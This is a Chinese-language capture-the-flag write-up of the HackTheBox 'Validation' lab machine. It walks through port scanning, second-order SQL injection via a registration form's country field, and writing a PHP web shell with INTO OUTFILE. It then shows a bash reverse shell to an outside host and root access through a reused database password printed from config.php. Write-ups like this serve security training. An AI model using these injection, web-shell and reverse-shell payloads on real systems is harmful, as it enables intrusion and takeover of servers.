HackTheBox-Validation

---

title: HackTheBox-Validation-SQLi author: Mosaic Theory layout: true categories: 漏洞实验 tags:

• • 打靶日记

---

Stars are bright everywhere, depending on whether you look up to see them.

星星在哪里都是很亮的，就看你有没有抬头去看他们。

HackTheBox-Validation

Recon:

Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-17 01:08:15 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 4566/tcp on 10.10.11.116                                  
Discovered open port 80/tcp on 10.10.11.116                                    
Discovered open port 22/tcp on 10.10.11.116                                    
Discovered open port 8080/tcp on 10.10.11.116 

Nmap scan report for 10.10.11.116
Host is up (0.23s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
|   256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_  256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp   open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
4566/tcp open  http    nginx
|_http-title: 403 Forbidden
8080/tcp open  http    nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.32 seconds

一个注册页面：

添加之后会回显在页面：

如果在同一个地点添加不一样的用户名也会回显：

>> dirsearch -u http://validation.htb/ -e php

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 8940
[09:18:48] 403 -  279B  - /.htpasswds
[09:18:48] 403 -  279B  - /.httr-oauth
[09:18:49] 403 -  279B  - /.htpasswd_test
[09:19:01] 200 -   16B  - /account.php
[09:19:14] 200 -    0B  - /config.php
[09:19:17] 301 -  314B  - /css  ->  http://validation.htb/css/
[09:19:25] 200 -   16KB - /index.php
[09:19:25] 200 -   16KB - /index.php/login/
[09:19:26] 403 -  279B  - /js/
[09:19:26] 301 -  313B  - /js  ->  http://validation.htb/js/

config读取不出来，login与index一样，只是没有了渲染。

POST / HTTP/1.1
Host: validation.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://validation.htb
DNT: 1
Connection: close
Referer: http://validation.htb/
Cookie: user=ca28b722bc10aa4b3beb941d5ca220ca
Upgrade-Insecure-Requests: 1

username=admin&country=Brazil

SQLi：

无论如何更改参数服务器都会响应一个set cookie，如果在Country后边添加一个单引号，服务器一样会返回一个cookie，但是如果用它返回的cookie当作用户名，服务端会返回一些报错信息：

    </div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome 21232f297a57a5a743894a0e4a801fc3'</h1><h3 class="text-white">Other Players In Brazil'</h3><br />
<b>Fatal error</b>:  Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
  thrown in <b>/var/www/html/account.php</b> on line <b>33

为验证这个猜想，我在单引号后边又添加了注释：

>> curl -v -d "username=hack&country=Brazil'-- -" http://validation.htb            
*   Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> POST / HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Content-Length: 32
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Tue, 17 May 2022 01:49:16 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Set-Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34
< Location: /account.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host validation.htb left intact

>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
*   Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> GET /account.php HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Tue, 17 May 2022 01:50:54 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Vary: Accept-Encoding
< Content-Length: 762
< Content-Type: text/html; charset=UTF-8
< 
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->

<div class="container">
        <h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
        
    </div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'-- </h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>admin</li>  </div>
    </section>
</div>
* Connection #0 to host validation.htb left intact

这次并没有报错，这似乎是一个二次注入：

>> curl -v -d "username=hack&country=Brazil'union select 1--+" http://validation.htb
*   Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> POST / HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Content-Length: 46
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Tue, 17 May 2022 01:55:16 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Set-Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34
< Location: /account.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host validation.htb left intact

>> curl -v --cookie "user=21232f297a57a5a743894a0e4a801fc3" http://validation.htb/account.php

<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->

<div class="container">
        <h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
        
    </div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome admin</h1><h3 class="text-white">Other Players In Belgium' union select 1-- -</h3><li class='text-white'>1</li></div>
    </section>
</div>
* Connection #0 to host validation.htb left intact

看起来有回显。

>> curl -v -d "username=hack&country=Brazil'union select user()--+" http://validation.htb

>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php

<div class="container">
        <h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
        
    </div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'union select user()-- </h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>uhc@localhost</li>  </div>
    </section>
</div>

获取到当前用户：uhc@localhost。

>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php

<!------ Include the above in your HEAD tag ---------->

<div class="container">
        <h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
        
    </div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'union select database()-- </h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>registration</li>  </div>
    </section>
</div>
* Connection #0 to host validation.htb left intact

当前数据库registration:

>> curl -v -d "username=hack&country=Brazil'union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'"-- -" http://validation.htb

>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php

<section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'"-- -</h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>SELECT</li><li class='text-white'>INSERT</li><li class='text-white'>UPDATE</li><li class='text-white'>DELETE</li><li class='text-white'>CREATE</li><li class='text-white'>DROP</li><li class='text-white'>RELOAD</li><li class='text-white'>SHUTDOWN</li><li class='text-white'>PROCESS</li><li class='text-white'>FILE</li><li class='text-white'>REFERENCES</li><li class='text-white'>INDEX</li><li class='text-white'>ALTER</li><li class='text-white'>SHOW DATABASES</li><li class='text-white'>SUPER</li><li class='text-white'>CREATE TEMPORARY TABLES</li><li class='text-white'>LOCK TABLES</li><li class='text-white'>EXECUTE</li><li class='text-white'>REPLICATION SLAVE</li><li class='text-white'>BINLOG MONITOR</li><li class='text-white'>CREATE VIEW</li><li class='text-white'>SHOW VIEW</li><li class='text-white'>CREATE ROUTINE</li><li class='text-white'>ALTER ROUTINE</li><li class='text-white'>CREATE USER</li><li class='text-white'>EVENT</li><li class='text-white'>TRIGGER</li><li class='text-white'>CREATE TABLESPACE</li><li class='text-white'>DELETE HISTORY</li><li class='text-white'>SET USER</li><li class='text-white'>FEDERATED ADMIN</li><li class='text-white'>CONNECTION ADMIN</li><li class='text-white'>READ_ONLY ADMIN</li><li class='text-white'>REPLICATION SLAVE ADMIN</li><li class='text-white'>REPLICATION MASTER ADMIN</li><li class='text-white'>BINLOG ADMIN</li><li class='text-white'>BINLOG REPLAY</li><li class='text-white'>SLAVE MONITOR</li>  </div>
    </section>
</div>
* Connection #0 to host validation.htb left intact

我当前的用户权限很多，而且它拥有File权限：

>> curl -v -d "username=hack&country=Belgium' union select ' can you see me ?' into outfile '/var/www/html/test.txt'-- - " http://validation.htb/

>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php

<div class="container">
        <h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
        
    </div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Belgium' union select ' can you see me ?' into outfile '/var/www/html/test.txt'-- - </h3><br />
<b>Fatal error</b>:  Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
  thrown in <b>/var/www/html/account.php</b> on line <b>33</b><br />
* Connection #0 to host validation.htb left intact

>> curl http://validation.htb/test.txt                                                       
 can you see me ?
                  

我可以写WebShell，符号太多会出错，可进行编码：

>> curl -v -d "username=hack&country=Belgium' union select %22%3C%3Fphp%20SYSTEM(%24_REQUEST%5B%27cmd%27%5D)%3B%20%3F%3E%22%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fhtml%2Fshell.php%27%3B--%20-" http://validation.htb

>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php

>> curl http://validation.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse shell：

>> curl http://validation.htb/shell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.16.7/9001 0>&1"'

>> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.116] 40708
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@validation:/var/www/html$

script /dev/null -c bash
^Z
stty raw -echo; fg
reset
screen

对用户目录有读取权限：

www-data@validation:/var/www/html$ ls
account.php  config.php  css  index.php  js  shell.php
www-data@validation:/var/www/html$ cd ~
www-data@validation:/var/www$ ls
html
www-data@validation:/var/www$ cd /
www-data@validation:/$ cd home/
www-data@validation:/home$ ls
htb
www-data@validation:/home$ cd htb/
www-data@validation:/home/htb$ ls
user.txt
www-data@validation:/home/htb$ cat user.txt 
07..................................

在配置文件里有一串密码，uhc用户会提示不存在，但是尝试密码复用root会成功：

www-data@validation:/var/www/html$ ls
account.php  config.php  css  index.php  js
www-data@validation:/var/www/html$ cat config.php 
<?php
  $servername = "127.0.0.1";
  $username = "uhc";
  $password = "uhc-9qual-global-pw";
  $dbname = "registration";

  $conn = new mysqli($servername, $username, $password, $dbname);
?>
www-data@validation:/var/www/html$ su uhc
su: user uhc does not exist or the user entry does not contain all the required fields
www-data@validation:/var/www/html$ su -
Password: 
root@validation:~# cat /root/root.txt 
7a..................................

原文始发于微信公众号（老鑫安全）：HackTheBox-Validation